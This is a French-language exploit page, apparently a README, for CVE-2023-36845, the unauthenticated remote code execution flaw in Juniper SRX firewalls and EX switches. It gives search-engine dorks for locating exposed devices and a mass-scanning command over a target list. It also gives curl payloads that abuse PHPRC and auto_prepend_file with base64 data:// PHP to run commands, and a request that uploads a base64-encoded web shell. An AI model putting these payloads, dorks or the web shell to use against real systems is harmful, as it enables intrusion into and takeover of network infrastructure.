
Exploit pour CVE-2023-36845, une vulnérabilité de manipulation de variables d'environnement PHP dans Juniper SRX/EX, permettant l'exécution de code à distance non authentifiée via des requêtes HTTP forgées.
CVE-2023-36845 représente une vulnérabilité notable de manipulation de variables d'environnement PHP qui impacte les pare-feux Juniper SRX et les commutateurs EX. Bien que Juniper ait classé cette vulnérabilité comme étant de sévérité moyenne, dans cet article, nous expliquerons comment cette seule vulnérabilité peut être exploitée pour une exécution de code à distance sans authentification.
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
Détection
python3 CVE-2023-36845.py -f cibles.txt -o sortie.txt
Il est possible d'utiliser n'importe quel wrapper de protocole en conjonction avec auto_prepend_file. Le choix le plus approprié pour cette opération est le protocole data://, qui permet de fournir le « fichier secondaire » en ligne. Voici une représentation sophistiquée de cette exploitation, exécutant le <? phpinfo(); ?> intégré dans le schéma data:// :
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
Exécuter la commande whoami
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
Téléverser un fichier
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| Paramètre | Description | Type |
|---|---|---|
| --file / -f | Fichier d'entrée des cibles | Fichier |
| -o | Fichier de sortie | Fichier |